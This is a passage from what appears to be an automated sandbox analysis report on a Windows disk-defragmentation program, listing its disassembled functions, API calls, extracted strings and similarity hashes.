                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\$JD$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 4273481478-1318463505
                                                                                                                                                                                                                                                                                    • Opcode ID: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                    • Instruction ID: dcbbcf768856184cb3fb00598b231148ced9fb8d52ef67d3d26bd90cee913ac4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA616C72608300AFC310DF69D88196BF7E4FFD8711F804A2EF55987291EB759848CB96
                                                                                                                                                                                                                                                                                    Function 00453BD0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00453C29
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453C9B
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453CD3
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045B451), ref: 00453CE3
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453D14
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00453D23
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D2E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D64
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D94
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\$JD$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 4273481478-1318463505
                                                                                                                                                                                                                                                                                    • Opcode ID: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e319efc0b140ea32d15ab3920dd7af36ea307e7c4a1d425a09acf6eef36fbe0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9617BB2608300AFC314DF69DC8196BF7F4EFD8751F804A2EF55983251E77599088B9A
                                                                                                                                                                                                                                                                                    Function 004197C0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 287comCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00419894
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 004198B6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Uninitialize$BlanketCreateInitializeInstanceProxy
                                                                                                                                                                                                                                                                                    • String ID: Caption$SELECT * from Win32_Volume$WQL
                                                                                                                                                                                                                                                                                    • API String ID: 3575674281-2330458756
                                                                                                                                                                                                                                                                                    • Opcode ID: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                    • Instruction ID: d51c13efc7a02c32f90284d818f56e509f551fc104d77d5da5b0aeb1152a1774
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10A189766083449FC300EF59C890A9BB7E9EF88354F10491EF44997360D779ED89CBA5
                                                                                                                                                                                                                                                                                    Function 00422450 Relevance: 22.7, APIs: 15, Instructions: 169windowtimeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(004216E9), ref: 00422459
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004224AE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004224E0
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(004216E9,00000001,000003E8,00000000), ref: 0042250F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00422558
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008013,00000000), ref: 0042256D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008007,00000000), ref: 00422582
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,0000800C,00000000), ref: 00422597
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(004216E9,00000064,00000064,00000000), ref: 004225A3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timer$Window
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 389327760-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                    • Instruction ID: a9acc03ce2714c2a1218ac3b36ef8cf29172f02598394e016a1efff805efb144
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cefa6ec459511810d8e63057cbdb1cbfc242c52f6ba306b658606e850e188aac
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C516170390B00ABE624EB75CC82FD6B395AF44B04F40851DB359AB2D1CBF6B8418B48
                                                                                                                                                                                                                                                                                    Function 0040ECF0 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040ED30
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0040EDD3
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EDF9
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040EE67
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040EE77
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0040EEEE
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040EF77
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 0040EFD9
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 0040F00C
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0040F073
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$CompatibleCopyCreateMessageSend$Bitmap
                                                                                                                                                                                                                                                                                    • String ID: $8F
                                                                                                                                                                                                                                                                                    • API String ID: 2897418849-3711173759
                                                                                                                                                                                                                                                                                    • Opcode ID: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                    • Instruction ID: af6e71f7250828e30cc2f680655b832ce69016c02ffdd7eabd90966ae28b2504
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FC1F3B11083419FC324CF69C984B6BBBE9FF88704F108A2EF59993290DB74E945CB56
                                                                                                                                                                                                                                                                                    Function 00425C00 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 00425C5A
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000003), ref: 00425C85
                                                                                                                                                                                                                                                                                    • CheckMenuItem.USER32(?,00008029,00000008), ref: 00425DAB
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000088), ref: 00425DBD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CheckItemLoadRectWindow
                                                                                                                                                                                                                                                                                    • String ID: 1003007$1003008$1003009$1003010$3401095$DefragFinish$DiskDefrag$^H
                                                                                                                                                                                                                                                                                    • API String ID: 64815558-4023297699
                                                                                                                                                                                                                                                                                    • Opcode ID: ead8703bd85feaaf811e813f8d945daf84a0c683d4c383d215f8f4dd8e18e0af
                                                                                                                                                                                                                                                                                    • Instruction ID: 4418ca87599e6f793fb4d10bf028e48e6936bb9db45e74f47fa123fcf7e21ce3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ead8703bd85feaaf811e813f8d945daf84a0c683d4c383d215f8f4dd8e18e0af
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2151CAB1794701BAE350AB609C47FAB7268AB84B14F10C91FB75EB65C0CEFCA405875D
                                                                                                                                                                                                                                                                                    Function 0042FDF0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FE87
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FF25
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000083FE,?,?), ref: 0042FF79
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FFF3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00430097
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                    • String ID: /e,/select,"%s%s"$8F$explorer.exe$open
                                                                                                                                                                                                                                                                                    • API String ID: 2245208738-1918814442
                                                                                                                                                                                                                                                                                    • Opcode ID: 7f607d863b6fb882b440f61bdd827dd6c45e564961a4f60de1fcfc532822dc8d
                                                                                                                                                                                                                                                                                    • Instruction ID: 422179ffa12990fac143fec7e91d506efcaf28af02f31003f6d515ad2e321b24
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f607d863b6fb882b440f61bdd827dd6c45e564961a4f60de1fcfc532822dc8d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AC1C4312043008BC710EF24D995B9BB7F5BF88704F500A6EF9499B296DB74ED49CB9A
                                                                                                                                                                                                                                                                                    Function 0042CAA0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 142windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CAB6
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0042CAE7
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0042CB0D
                                                                                                                                                                                                                                                                                    • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB22
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0042CB35
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0042CB43
                                                                                                                                                                                                                                                                                    • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB58
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$NotifyParentVisibleWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F$LG$`=$F
                                                                                                                                                                                                                                                                                    • API String ID: 2910063261-562919243
                                                                                                                                                                                                                                                                                    • Opcode ID: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                    • Instruction ID: cbd818397c052fadd252f380dd8efe1df66f27c17fa2dba641e1c387511c7e9b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0511030764700ABE224EF31DDD6FEA7394BB50B04F90842EB25F9A1D19FA47944CB99
                                                                                                                                                                                                                                                                                    Function 00415960 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004159AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00415AB2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402005$3402065$3402067$3402068$3402069$3402070$3402071$3402072$3402084
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-328498535
                                                                                                                                                                                                                                                                                    • Opcode ID: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                    • Instruction ID: 1067327c746e147da740696a904bc1cbb70a89f86cbb7c2e495eb833b01c89ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36413CF0B907407AD260AF618D43FEA3268AF84F04F60C42FB70E765D1CAEC6905969D
                                                                                                                                                                                                                                                                                    Function 00417F00 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 110windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00417F45
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00417F5B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0047D9D0,00001001,00000000,?), ref: 0041804D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
